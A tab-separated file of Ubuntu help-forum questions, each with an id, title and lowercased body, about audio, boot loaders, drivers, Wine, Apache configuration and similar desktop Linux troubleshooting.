325397	no hdmi audio in 13.04 ( more specific )	i know this question has been asked a million times , but none of the things i 've tried from other answers have worked . i 've got a caicos hdmi audio [ radeon hd 6400 series ] audio device and i 've installed `` pulseaudio volume control '' after reading this thread http : //askubuntu.com/a/232407/45985 and i can see `` radeon hd 6400 '' listed in the output devices and see the volume meter moving when i try to playback audio , but nothing comes through the speakers . aplay -l outputs : **** list of playback hardware devices **** card 0 : sb [ hda ati sb ] , device 0 : vt1708s analog [ vt1708s analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : sb [ hda ati sb ] , device 3 : vt1708s digital [ vt1708s digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : generic [ hd-audio generic ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 screenshot of alsamixer i can also see the `` output bar '' moving as if it were playing audio , but still no sound from the speakers ... any ideas ? thanks in advance , dan
325402	booting win7/12.04 -- what do i need for easybcd ?	i 've tried installing 12.04 about three times now into a 150gb partition on the same hd as win7 . no luck so far -- the install always seems to work , but i never get a boot option . the 12.04 live cd does n't have internet drivers for my mobo , so i ca n't access boot-repair from a live cd run . so i 'm trying easybcd on windows , and ca n't get it to work either . what settings do i need for easybcd to locate and boot ubuntu from this partition ?
325403	steam fails to launch game	when i try to launch any game in steam it comes up with preparing to launch for e.g dota 2 then that box closes and never loads game up . any help would be appreciated .
325404	help installing a patch inside wine	first off i would like to say , i 'm still relatively new to linux . having been a long time windows user i 'm used to being baby sat through things i want to do haha . anyway on to my question . i currently run wine to play a lot of my favourite games , so far i 've been lucky and not run into any issues at all . i have a few niggles but nothing i ca n't fix myself except for this one . i want to play grand theft auto san andreas . the game runs beautifully with the exception of a sound problem . i went to the wine hq page and read through some solutions to the same problem that a lot of people seem to be having . the bug is here : http : //bugs.winehq.org/show_bug.cgi ? id=14896 someone wrote a custom patch to fix this issue . i asked someone how i would go about installing the custom patch that would fix this problem , and i was linked to a page with instructions that just made my head spin ! i really ca n't make sense of a lot of it . because as i stated , i 'm still quite new to linux . i 'm getting better with linux but there 's still a lot i need to learn . if anyone would be willing to either point me to some more simplified instructions on how to accomplish this or write some out for me , i would forever be in your debt ! in case it 's of any relevance , im running ubuntu 13.04 64bit wine version 1.4.1
325406	grub can not load ubuntu	my computer refused load ubuntu and instead gave me grub . when i typed boot , it said you need to load the kernel first . i saw some other stuff on grub so i have tried find /boot/grub/stage1 but it gives me an error ( ca n't find command 'find ' ) . if it matters , i believe this error was caused by a startup repair from windows ( which i think affects the disk ) so if anyone can help me .
325416	why do i get libusb_error_access when trying to get my xbox controller working ?	i ca n't get my xbox controller to work . it does n't show up on jstest . can anyone help ? when i type xboxdrv on a terminal , this is what i get : : user @ chrubuntu : ~ $ xboxdrv xboxdrv 0.8.5 - http : //pingus.seul.org/~grumbel/xboxdrv/ copyright âš 2008-2011 ingo ruhnke < grumbel @ gmx.de > licensed under gnu gpl version 3 or later < http : //gnu.org/licenses/gpl.html > this program comes with absolutely no warranty . this is free software , and you are welcome to redistribute it under certain conditions ; see the file copying for details . controller : power a mini pro elite glow vendor/product : 24c6:5300 usb path : 002:036 controller type : xbox360 -- [ error ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- usbcontroller : :usbcontroller ( ) : libusb_open ( ) failed : libusb_error_access
325417	gnome-shell only shows wallpaper	so , i just installed gnome-shell on my lubuntu 12.10 . after i logged in with gnome , it just stay there showing only wallpaper and my cursor and no , i can not open a terminal emulator from there . ctrl-alt-t did n't worked . what should i do to fix this ? btw , this is my xsession-errors log ( gnome-settings-daemon:6643 ) : color-plugin-warning ** : there is no colord server available ( gnome-shell:6669 ) : glib-gobject-warning ** : invalid ( null ) pointer instance ( gnome-shell:6669 ) : glib-gobject-critical ** : g_signal_connect_data : assertion `g_type_check_instance ( instance ) ' failed gnome-session [ 6590 ] : warning : application 'gnome-shell.desktop ' killed by signal 11 ( gnome-shell:6680 ) : glib-gobject-warning ** : invalid ( null ) pointer instance ( gnome-shell:6680 ) : glib-gobject-critical ** : g_signal_connect_data : assertion `g_type_check_instance ( instance ) ' failed gnome-session [ 6590 ] : warning : application 'gnome-shell.desktop ' killed by signal 11 gnome-session [ 6590 ] : warning : app 'gnome-shell.desktop ' respawning too quickly gnome-session [ 6590 ] : critical : we failed , but the fail whale is dead . sorry ... . ( nm-applet:6697 ) : glib-gobject-warning ** : invalid ( null ) pointer instance ( nm-applet:6697 ) : glib-gobject-critical ** : g_signal_connect_data : assertion `g_type_check_instance ( instance ) ' failed ( gnome-user-share:7003 ) : glib-gobject-warning ** : invalid ( null ) pointer instance ( gnome-user-share:7003 ) : glib-gobject-critical ** : g_signal_connect_data : assertion `g_type_check_instance ( instance ) ' failed ** ( zeitgeist-datahub:7009 ) : warning ** : recent-manager-provider.vala:133 : desktop file for `` file : ///usr/share/lubuntu/wallpapers/1210-sunset_by_luca_andrea_rossi.jpg '' was not found , exec : lxpanel , mime_type : image/jpeg ( update-notifier:7037 ) : glib-gobject-warning ** : invalid ( null ) pointer instance ( update-notifier:7037 ) : glib-gobject-critical ** : g_signal_connect_data : assertion `g_type_check_instance ( instance ) ' failed ( gnome-settings-daemon:6643 ) : gdk-warning ** : gnome-settings-daemon : fatal io error 11 ( resource temporarily unavailable ) on x server :0. blueman-applet : fatal io error 11 ( resource temporarily unavailable ) on x server :0 . ** ( zeitgeist-datahub:7009 ) : warning ** : zeitgeist-datahub.vala:227 : unable to get name `` org.gnome.zeitgeist.datahub '' on the bus !
325418	no sound in dual os	i 'm using a chromebook and i 've installed ubuntu on it with crouton ... my sound is fine when i 'm in my chrome os but i have no sound at all when i 'm in ubuntu . uhhhh ... what do you think ?
325423	why do n't my broadcom modules automatically load ?	at work i was given a dell lattitude e6320 laptop ( 64-bit ) with windows 7 installed on it . i used it for a few months ( with no problems using wired or wireless networking ) and then decided to gut the os and replace it with ubuntu desktop 12.04 . and i loved it . the only problem was : i lost ( or thought i lost ) all wireless capabilities . all of the sudden , wireless was disabled on my machine , and as such , i could n't find any of the wireless networks i was used to using . last week , a co-worker recommended trying sudo modprobe wl because he thought it might be my broadcom wifi drivers ; i gave it a try and it works . so now , in order to have wifi , i need to run sudo modprobe wl . why ( specifically ) ? are these drivers not supported in the ubuntu repositories for some reason ?
325426	where do broadcom wireless drivers log ?	i 'm on ubuntu desktop 12.04 and i have a feeling that my laptop 's broadcom wireless drivers are the root cause of my machine crashing every so often without any reproducible reason . i 'll spare you the details of my troubleshooting , but i 'm almost positive its these wireless drivers . where would i find log output from these drivers directly , or from anything tangent to them ? i ask so that the next time my machine crashes , i can go to those logs , view timestamps , and see if there are any dead giveaways . thanks in advance !
325431	hardware acceleration of chrome 's flash plugin	running flash in google chrome drains my cpu massively : i figured that the cause of this issue would be that hardware acceleration of flash is turned off . when i tried turning it by right clicking a flash application and selecting settings , this window popped up : no hardware acceleration options can be found . in chrome , when i open about : gpu , i get to see this : how do i turn hardware acceleration on in flash or is there an alternative way of reducing the cpu usage ?
325434	why ubuntu does n't load settings from my .bashrc/.profile for apps not started from bash ?	at other and previous distros it was common for me to have the environment setup in .bashrc/.profile applied globally , whether i started applications from bash or not ( iirc ) . now when i start applications from launcher icons or when clicking files with associated applications , they do n't inherent my environment configuration . why of this now ? and how can i get the desired behavior or what 's the right way for this ? disclaimer : i 've already set some vars from my .bashrc by putting the exports at a .xsessionrc file , but i 'd really like an approach where i put configurations in a single file without having duplicated setup .
325436	i want to install an iso dvd burner , but i do n't know , which application i need to use for it	i 'm new to ubuntu , could someone help me with an installer application ? i have a 12.04 lts ...
325451	ubuntu 13.04 -- installation loop	my laptop ( dell inspiron 7520 ) came pre-installed with ubuntu 12.10 ( it even has a ubuntu sticker on it ) but i wiped it out and switched to windows 8 . i have been trying to install ubuntu 13.04 with a liveusb . after selecting `` install ubuntu inside windows 8 '' option , the laptop restarts and goes back to the same screen ( install ubuntu or try ubuntu ) . it seems to be stuck in a loop .
325453	does ubuntu 12.04 have video drivers for nvidia quadro or amd firepro gpu 's ?	i was building a workstation for video production and i wanted to use ether a amd firepro or nvidia quadro graphics card . i am very much a fan of ubuntu and i was wondering if 12.04 supported any of those cards and if so , which ones ?
325463	ssd and hdd dual boot	i have got win 8 on my ssd and i want to install ubuntu on my hdd . can i ? thanks . my ssd is 120 gb and when i try to access it gives this error in `` trying ubuntu '' : error mounting /dev/sda2 at /media/ubuntu/2284bd1e84bcf57f : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=999 , gid=999 , dmask=0077 , fmask=0177 '' `` /dev/sda2 '' `` /media/ubuntu/2284bd1e84bcf57f '' ' exited with non-zero exit status 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda2 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . thanks for advance .
325464	2 windows 8 loaders appearing at the grub menu	so , after an install of xubuntu , my grub loader has 3 things , xubuntu and then 2 windows 8 loaders how can i fix this ?
325470	pre-installed windows ; drive partition	i got a laptop with pre-installed windows 8 . i want to dual-boot ubuntu on it . the problem is that my laptop has only one drive ( no partition ) . how do i install ubuntu without losing my pre-installed windows and all the data stored . is there any way to make partition without having the risk of losing the windows data .
325474	ubuntu 13.04 can be installed from windows ?	can i install ubuntu 13.04 from windows same like windows application ? i downloaded iso file from internet . but i am not experienced how should i install ubuntu inside windows ? i dont have cd , and i prefer to do it as like window application file . i have 32bit windows xp in use . suggestions ?
325479	using a windows based program on ubuntu called groupmail 5 ?	i just started using ubuntu and am very happy with the system.i had a windows based program called groupmail 5 that i used for marketing for my business.i talked to their it people and they told me that it is windows based and that i would need a windows enabler to be able to use it on linux , mhat is a good
325483	wireless problems on ubuntu 12.04 x64	i installed ubuntu 12.04 lts x64 on my laptop . when i try to connect to my wireless it keeps trying but does n't connect . my phone works fine . i 've tried to look it up but no luck , any suggestions ? ps : i also tried to connect the wire directly to the laptop , still tries but fails i 'm using a samsung np300e4c-s01 edit : for some wired reason , now it connects to my router but i do n't have internet access . ps : i did n't delete my windows 7 yet
325484	ubuntu on a fakeraid	how do i install ubuntu alongside windows and if possible on the second drive of a computer with fakeraid ( im new to linux so if you got answers please keep them simple ) additional info : i am on raid 0 my pc is pretty new and highend
325485	how to make a mesh by using python script on blender	i want to know how to make a mesh having vertices and faces by using python script from mathematical equations , for example , spherical harmonics , and so on . if the sample code of an easy function is shown , the rest will be made by myself . ubuntu version : 12.04 blender version : 2.62 added information ( 2013/08/02 ) : i found very useful site , blender python : mathematical mesh finally i got an example , this is the case of normal distribution . import bpy import math # clear mesh and object for item in bpy.context.scene.objects : if item.type == 'mesh ' : bpy.context.scene.objects.unlink ( item ) for item in bpy.data.objects : if item.type == 'mesh ' : bpy.data.objects.remove ( item ) for item in bpy.data.meshes : bpy.data.meshes.remove ( item ) for item in bpy.data.materials : bpy.data.materials.remove ( item ) # mesh arrays verts = [ ] faces = [ ] # mesh variables numx = 100 numy = 100 # variance and scale variables variance = .35 scale = 4 # fill verts array for i in range ( 0 , numx ) : for j in range ( 0 , numy ) : # nomalize range u = 2* ( i/numx-1/2 ) v = 2* ( j/numy-1/2 ) s = variance x = scale*u y = scale*v z = scale*1/math.sqrt ( 2*math.pi*s*s ) *math.exp ( - ( u*u+v*v ) / ( 2*s*s ) ) vert = ( x , y , z ) verts.append ( vert ) # fill faces array count = 0 for i in range ( 0 , numy * ( numx-1 ) ) : if count < numy-1 : a = i b = i+1 c = ( i+numy ) +1 d = ( i+numy ) face = ( a , b , c , d ) faces.append ( face ) count = count + 1 else : count = 0 # create mesh and object mesh = bpy.data.meshes.new ( `` wave '' ) object = bpy.data.objects.new ( `` wave '' , mesh ) # set mesh location object.location = bpy.context.scene.cursor_location bpy.context.scene.objects.link ( object ) # create mesh from python data mesh.from_pydata ( verts , [ ] , faces ) mesh.update ( calc_edges=true ) screenshot :
325489	an error has occurred setting the element data	i am from kerala , a small state in india..we have low internet speed..so after start installing process of ubuntu 12.04 amd64 inside windows 7 home is very difficult..even though today it is complete after trying two weeks..but after exstracting the following error is shown : > > stdout= traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 132 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\win32\backend.py '' , line 697 , in modify_bcd file `` \lib\wubi\backends\common\utils.py '' , line 66 , in run_command exception : error executing command > > command=c : \windows\sysnative\bcdedit.exe /set { 69ddb1fb-def5-11e2-b1b1-fa7722f9a0cd } device partition=h : > > retval=1 > > stderr=an error has occurred setting the element data . the request is not supported . and window closed.. i ran wubi again , but they ask to uninstall previous of ubuntu . if i do that then do i need to download process again which is difficult . is there any other option ? but i need windows 7 too . please help me , i am very poor about computer and this types .
325491	how to properly display utmp , wtmp , btmp ?	how can i display the /var/run/utmp , /var/log/wtmp , /var/log/btmp by using cat . while i am trying to display them , i am getting some other characters too.here 's the output . jai @ frank-jai : ~ $ cat /var/run/utmp ~~~reboot3.8.0-26-genericf�q % p 2~~~runlevel3.8.0-26-genericf�q � �tty44login�f�q�tty55login�f�q�tty22login�f�q�tty33login�f�q�tty66login�f�q�tty11login�k�qtty7:0jai:0y�q ��pts/0/0jai:0.0� { �qfqjai @ frank-jai : ~ $ cat /var/log/wtmp ~~~reboot3.8.0-19-generic��q�b 2~~~runlevel3.8.0-19-generic��q�c *tty44login*��q0tty55login0��q : tty22login : ��q ; tty33login ; ��q=tty66login=��q '' tty11login '' ��q�pts/1/1jai:0.0��q�d pts/1/1jai��q��� pts/1/1jai:0.0t��q�� pts/2/2jai:0.0���q � pts/3/3jai:0.0`��qpts/3/3jaib��qpts/1/1jai '' ��q pts/2/2jai '' ��q62~~~ru*tty44* ; ��q�0tty550 ; ��q� : tty22 : ; ��q� ; tty33 ; ; ��qm=tty66= ; ��q� `` tty11 '' ; ��ql , ~~~shutdown3.8.0-19-generich��qz�~~~reboot3.8.0-26-generic���q-�2~~~runlevel3.8.0-26-generic���q�ctty44loginc���qjtty55loginj���qutty22loginu���qvtty33loginv���qytty66loginy���q ? tty11login ? ���q02~~~runlevel3.8.0-26-generic���q . ctty44c���qjtty55j���qutty22u���qvtty33v���qytty66y���q ? tty11 ? ���q�~~~shutdown3.8.0-26-generic���q�~~~reboot3.8.0-26-genericʩ�stty44loginsʩ�qztty55loginzʩ�q�tty22login�˩�qtty33login˩�q�tty66login�˩�qctty11loginc˩�qpts/0/0jai:0.0b��qp� pts/1/1jai:0.0��qopts/1/1jai��q ( c ptspts/1/1jai��q '' pts/0/0jai ; �q� stty44s�a�q��ztty55z�a�q��i�tty22��a�q��ntty33�a�qz�26-ge�tty66��a�qmn ctty11c�a�qz ~~~shutdown3.8.0-26-generic�a�q �~~~reboot3.8.0-26-generic e�q�2~~~runlevel3.8.0-26-generic e�q�imtty44loginm e�qstty55logins e�q ] tty22login ] e�q^tty33login^ e�q`tty66login` e�q�tty11login� # e�ql pts/0/0jai:0.0l�q� # pts/0/0jai:0.0 : t�q # ; pts/0/0jai߂�qo|02~~~runlevel3.8.0-26-generic߂�qu�mtty44m߂�qstty55s߂�q ] tty22 ] ߂�q^tty33^߂�q`tty66`߂�q� �tty11�߂�q�d ~~~shutdown3.8.0-26-generic���q ~~~reboot3.8.0-26-generic���q�2~~~runlevel3.8.0-26-generic���q [ �ktty44logink���qqtty55loginq���q { tty22login { ���q|tty33lopts/2/2jail��q��62~~~runlevel3.8.0-26-genericl��q��ktty44kl��qqtty55ql��q { tty22 { l��qy |tty33|l��q @ �tty66�l��q� �tty11�l��q�m ~~~shutdown3.8.utty44loginuw��q } tty55login } w��qtty22loginw��q�tty33login�w��q�tty66pts/0/0jai:0.0���qpts/0/0jaiv��ql�02~~~runlevel3.8.0-26-genericv��q�butty44uv��q1 } tty55 } v��q4 tty22v��q* �tty33�v��q & �tty66�v��q3 �tty11�v��q� ~~~shutdown3.8.0-26-generic���qn % ~~~reboot3.8.0-26-generic���q y2~~~runlevel3.8.0-26-generic���q��tty44login���q�tty55login����q�tty22login����q�tty33login����q�tty66login����q�tty11login����q02~~~runleveltty44 ] ��q��tty55� ] ��q��tty22� ] ��q��tty33� ] ��q��tty66� ] ��qe�tty11� ] ��q��~~~shutdown3.8.0-26-genericj��q�q~~~reboot3.8.0-26-genericc��qq� 2~~~runleveltty44loginlc��qptty55loginpc��qvtty22loginvc��qwtty33loginwd��qytty66loginyd��q�tty11login�e��q62~~~runlevel3.8.0-26-generice��qltty44lf��q ) ptty55pf��q4vtty22vf��q�7wtty33wf��q�=ytty66yf��q�b�tty11�f��q�^~~~shutdown3.8.0-26-generics��q ~~~reboot3.8.0-26-genericz ? �qغ2~~~runlevel3.8.0-26-genericz ? �q��tty44loginz ? �q�tty55login�z ? �q�tty22login�z ? �q�tty33login�z ? �q�tty66login�z ? �q�tty11login� [ ? �q62~~~runlevel3.8.0-26-generich ? �qctty44h ? �q �tty55�h ? �qm�tty22�h ? �q9�tty33�h ? �q��tty66�h ? �q�tty11�h ? �q��~~~shutdown3.8.0-26-generick ? �q5~~~reboot3.8.0-26-generic��q� > 2~~~runlevel3.8.0-26-generic��q�4utty44loginu��q { tty55login { ��q�tty22login���q�tty33login���q�tty66login���q�tty11login���q02~~~runlevel3.8.0-26-generic���q�utty44u���q� { tty55 { ���q��tty22����q�tty33����q��tty66����q�tty11����q '' ~~~shutdown3.8.0-26-generic���q ( ~~~reboot3.8.0-26-generic���q=2~~~runlevel3.8.0-26-generic���q� ; etty44logine���qjtty55loginj���qttty22logint���qztty33loginz���q�tty66login����q�tty11login����q�pts/0/0jai:0.0 [ j�qe5 pts/0/0jai�m�q�pts/0/0jai:0.0�m�q�pts/0/0jain�q��62~~~runlevel3.8.0-26-generic0n�q��etty44e0n�qjtty55j0n�q� ttty22t0n�q � ztty33z0n�q'� �tty66�0n�q @ � �tty11�0n�qu� ~~~shutdown3.8.0-26-generic > n�q��~~~reboot3.8.0-26-generic�+�q�s2~~~runlevel3.8.0-26-generic�+�q� { tty44login { �+�q�tty55login��+�q�tty22login��+�q�tty33login��+�q�tty66login��+�q�tty11login��+�qk pts/0/0jai:0.0 < , �qpts/0/0jaih��qv� 62~~~runlevel3.8.0-26-generic��q ? � { tty44 { ��qt �tty55���q @ u �tty22���qpw �tty33���qiy �tty66���qv [ �tty11���q�j ~~~shutdown3.8.0-26-generic�q~~~reboot3.8.0-26-generic�_�q��2~~~runlevel3.8.0-26-generic�_�q9bhtty44loginh�_�qltty55loginl�_�qtty22login�_�q�tty33login��_�q�tty66login��_�q�tty11login��_�q02~~~runlevel3.8.0-26-generic�_�q @ htty44h�_�q�ltty55l�_�qjtty22�_�q+�tty33��_�q��tty66��_�q��tty11��_y~~~shutdown3.8.0-26-generic�_�qc�~~~reboot3.8.0-26-generic���q�d2~~~runlevel3.8.0-26-generic���q7yktty44logink���qstty55logins���q�tty22login����q�tty33login����q�tty66login����q�tty11login����qg pts/0/0jai:0.0�-�q��ktty44k & d�q�stty55s & d�q��tty22� & d�q��tty33� & d�q < �tty66� & d�q4�tty11� & d�q`e~~~shutdown3.8.0-26-generic ) d�q�m ~~~reboot3.8.0-26-generic�q & �2~~~runlevel3.8.0-26-generic�q�4ktty44logink�qptty55loginp�q { tty22login { �q|tty33login|�q~tty66login~�q�tty11login��h�q02~~~runlevel3.8.0-26-generic�k�q�1 ktty44k�k�q�ptty55p�k�q� { tty22 { �k�q�|tty33|�k�q~tty66~�k�q�tty11��k�q�~~~shutdown3.8.0-26-generic�k�q�~~~reboot3.8.0-26-generic���q|2~~~runlevel3.8.0-26-generic���q3�tty44login����qtty55login���q�tty22login����q�tty33login����q�tty66login����q�tty11login����qo �tty44����qtty55����tty22����q��tty33����q��tty66����q��tty11����q��~~~shutdown3.8.0-26-generic���qm� ~~~reboot3.8.0-26-generic�q�2~~~runlevel3.8.0-26-generic�q*�ptty44loginp�qvtty55loginv�q�tty22login��q�tty33log�tty44login�qv�q�tty55login�qv�q�tty22login�qv�q�tty33login�qv�q�t0 # pts/4/4jai:0.0��qt`� ) pts/1/1root:0.0 % ��qpts/1/1root~��q'1pts/4/4jai���q�02�tty44�i��q ? ��tty55�i��q�tty22�i��q�tty33�i��q�tty66�i��q�tty11�i��q~~~shutdown3.8.0-26-genericy��q��~~~reboot3.8.0-26-generic���q < 2~~~runlevel3.8.0-26-generic���q�yotty44logino���qttty55logint���qztty22loginz���q { tty33login { ���qtty66login���q�tty11login����q� pts/0/0jai:0.0p ( �qdhpts/0/0jain*�q�� 02~~~runlevel3.8.0-26-generic7 > �q֯ otty44o8 > �q�ttty55t8 > �q�ztty22z8 > �q� { tty33 { 8 > �q5tty668 > �q7�tty11�8 > �qk�~~~shutdown3.8.0-26-genericg > �q�f~~~reboot3.8.0-26-generic���qz < 2~~~runlevel3.8.0-26-generic���q� % ptty44loginp���qttty55logint���qztty22loginz���q [ tty33login [ ���q^tty66~~~shutdown3.8.0-26-generic��q��~~~reboot3.8.0-26-generict��q ( sy44p��q� % 2~~~runlevel3.8.0-26-generict��q�3 ptty44loginpt��qttty55logintt��qztty22loginzt��q [ tty33login [ t��q^tty66login^t��q�tty11login�v��q�pts/0/0jai:0.0���qb�pts/1/1jai:0.0���q��pts/0/0jai���q��pts/1/1jai���q�02~~~runlevel3.8.0-26-genericu��q $ : ptty44pv��qttty55tv��q�ztty22zv��q [ tty33 [ v��^tty66^v��q�tty11�v��q��~~~shutdown3.8.0-26-generice��q� & ~~~reboot3.8.0-26-genericx �q2~~~runlevel3.8.0-26-genericx �qf�ytty44loginyx �q ] tty55login ] x �qctty22logincx �qetty33loginex �qitty66loginix �q�tty11login�y �qpts/0/0jai:0.0� �qlu �q @ �pts/1/1jai:0.0 pts/1/1jaii�q�l pts/0/0jaik�q��n ( pts/0/0jai:0.0��qpts/0/0jai� # �qb02~ytty44y�k�q� ( ] tty55 ] �k�q|1ctty22c�k�q�setty33e�k�q�witty66i�k�q� [ �tty11��k�q7�~~~shutdown3.8.0-26-generic�k�ql�~~~reboot3.8.0-26-generic��qmg 2~~~runlevel3.8.0-26-generic��q� �tty44login���q�tty55login���q�tty22login���q�tty33login���q�tty66login���qetty11logine��q� pts/1/1jai:0.0���q�h pts/1/1jaiw��q . �tty55�^��q�tty22�^��q�tty33�^��q�tty66�^��qetty11e^��q�~~~shutdown3.8.0-26-genericr��q�t~~~reboot3.8.0-26-generic��q ! q 2~~~runlevel3.8.0-26-generic��qy rtty44loginr��qvtty55loginv��q|tty22login|��q } tty33login } ��q�tty66login���qxtty11loginx��q� pts/1/1jai:0.0�q�� pts/2/2jai:0.0o & �qio � pts/3/3jai:0.0�'�q~pts/2/2jai� , �q/pts/3/3jai� , �q��pts/1/1jai2�qʸ % pts/�/2jai:0.0o ; �q͵pts/2/2jail < �q 7pts/2/2jai:0.0�p�q ( w 7pts/4/4jai:0.0�q�q'� pts/2/2jai� [ �qpts/4/4jai� [ �q�i02~~~runlevel3.8.0-26-generic� ] �q�rtty44r� ] �q� vtty55v� ] �q�� |tty22|� ] �qպ } tty33 } � ] �q9� �tty66�� ] �q�� xtty11x� ] �q� ~~~shutdown3.8.0-26-generic� ] �q��~~~reboot3.8.0-26-generic^�q|� 2~~~runlevel3.8.0-26-generic^�q�� �tty44login�^�q�tty55login�^�q�tty22login�^�q�tty33login�^�q�tty66login�^�q�tty11login�^�q pts/1/1jai:0.0�b�qpts/1/1jai�c�q΋ 62~~~runlevel3.8.0-26-generic�c�q��tty44��c�q5�tty55��c�q��tty22��c�q��tty33��c�q��tty66��c�q�tty11��c�q # # ~~~shutdown3.8.0-26-generic d�q�~~~reboot3.8.0-26-generici } �q� 2~~~runlevel3.8.0-26-generici } �q5 < �tty44login�i } �q�tty55login�i } �q�tty22login�i } �q�tty33login�i } �q�tty66login�i } �q�tty11login�p } �q~~~reboot3.8.0-26-generic1��q�2~~~runlevel3.8.0-26-generic1��q6�tty44login�1��q�tty55login�1��q�tty22login�1��q�tty33login�1��q�tty66login�1��qtty11login6��qlpts/1/1jai:0.05*�q�� pts/1/1jai�+�q1m & pts/0/0jai:0.0�4�pts/0/0jai�5�q��02~~~runlevel3.8.0-26-generic=�qq # �tty44�=�q� . �tty55�=�q�1 �tty22�=�qd4 �tty33�=�q�6 �tty66�=�9 tty11=�q $ f ~~~shutdown3.8.0-26-generic=�q��~~~shutdown3.8.0-26-generic=�q� % ~~~reboot3.8.0-26-generic } ��q ) | 2~~~runlevel3.8.0-26-generic } ��q4d �tty44login� } ��q�tty55login� } ��q�tty22login� } ��q�tty33login� } ��q�tty66login� } ��qtty11login���q� pts/1/1jai:0.0v��qpts/1/1jai6��qt�~~~reboot3.8.0-26-generic=��q2~~~runlevel3.8.0-26-generic=��q : p �tty44login�=��q�tty55login�=��qtty22login=��qtty33login=��q�tty66login�=��q�tty11login�c��q02~~~runlevel3.8.0-26-generic���q��tty44����q�tty55����q > tty22���qtty33���q~~~shutdown3.8.0-26-generic���ql�~~~reboot3.8.0-26-genericf�q % p 2~~~runlevel3.8.0-26-genericf�q � �tty44login�f�q�tty55login�f�q�tty22login�f�q�tty33login�f�q�tty66login�f�q�tty11login�k�q�pts/0/0jai:0.0� { �qfqjai @ frank-jai : ~ $ jai @ frank-jai : ~ $ sudo cat /var/log/btmp jai @ frank-jai : ~ $
325492	why do my videos look like this ?	i 'm running ubuntu 12.10 on a and this only happens when i play some 1080p videos most 1080p videos and blu-ray disk work really well , but other do not . i have all the restricted extras installed so i 'm not sure what the problem is . i 've even tried on gnome mplayer , vlc , and dragon player . any help would be great . edit : my graphic card is 3rd gen core processor graphics controller and the driver is driver=i915 latency=0 & my laptop model is a dell inspiron 17r-5720 .
325494	why does my screen say `` system is running in low graphics mode '' ?	also , since that message started appearing , i ca n't get past starting the computer and it directly goes to a screen that says frequency out of range . what can i do to fix this ?
325497	setting up dhcp without ethernet	i 'm a noob to networking so bare with me . since i want to learn how to network , i asked a friend about what i should start with . he told me i should learn home networking first such as dhcp and ipv4 networking and tcp/ip . here 's where the problem comes in : the setup i have is this : 1 modem , from my isp which i 'm guessing is a dhcp server but only leasing to itself ( if thats possible ) . i took the ethernet cable from that into a switch which would give the switch internet . i then hooked my router up on a .1 subnet . what i 'm trying to do is setup another subnet using my netbook as my dhcp server to hand out ip 's to my computer which is also hooked into the same switch . if i 'm correct , the subnet should just broadcast it to my computer which is hooked onto the same switch . i do n't know if it 's a subnetting issue or if it 's a gateway issue . edit : im also using the command line if i needed to clear that up : p http : //imgur.com/hrbhguv is what im trying to achieve , yet i cant get ethernet to work . bottom line : i cant connect to the internet to make everything else work . and i dont know why , i 've done it with the best of my abilities . it 's been giving me a headache for 2 weeks now . i 'm about to start my freshman year so i want to get it done with before school starts . just tell me if you need me to give any information , or if i was just unclear . thanks ! edit : i had an idea , could i take the signal on eth0 and broadcast a signal to my computer using my wireless card ?
325498	apache ca n't access folders in my home directory	i have changed the configuration of apache to point towards a folder in my home directory : < virtualhost *:80 > serveradmin webmaster @ localhost documentroot /home/dbugger/html < directory / > options followsymlinks allowoverride none < /directory > < directory /home/dbugger/html/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined alias /doc/ `` /usr/share/doc/ '' < directory `` /usr/share/doc/ '' > options indexes multiviews followsymlinks allowoverride none order deny , allow deny from all allow from 127.0.0.0/255.0.0.0 : :1/128 < /directory > < /virtualhost > i have even given my /home/dbugger/html permission 777 . but i still keep getting the same error message at http : //localhost : `` 403 forbidden '' what is it that i am missing ?
325504	ubuntu 12.04 : uninstall boost installed from source	i installed boost 1.54 libraries on ubuntu 12.04 , and it seems to conflict with my installation of libboost-all-dev , so i want to uninstall boost 1.54 libraries completely . how to uninstall the one installed from source ?
325506	making a screen for a running process	is there a way to give a running process a screen in ubuntu ?
325509	add sessions to grub	i have xubuntu installed on an old p3 computer . i also installed packages for lubuntu and kubuntu . grub has changed since i played wit it last so many years ago and i want to add the other sessions to grub 's choices . i could just make lots of hd partitions and install all separately but too much of a waste . also , many years ago there was a startup utility that would allow you to change grub and do lots of other start up type of things in a nice gui . i would then go back and look at what it did and experiment with the new commands i learned . anything like that now ? oh , the version i have is the latest lts , 12.04 oh , and ubuntuforums has been down for quite a while now . anyone have any new info ?
325511	why does ubuntu allow me to only upgrade to ubuntu 13.04 alpha release ?	i have ubuntu 12.10 , and i want to upgrade to ubuntu 13.04 . but what is weird is that ubuntu only allows me to update to 'ubuntu 13.04 alpha release . i do n't get it . some people say to go to software sources , and in the 'notify me of a new ubuntu version ' section i have to select 'for any new version ' but that does n't even help . the link of the screen shot of 'software sources ' is here : here is the link of the screen shot of the window that asks me to upgrade to ubuntu 13.04 alpha release : or is it because ubuntu did n't release a full version of 13.04 ? i do n't think that 's right , so please help me .
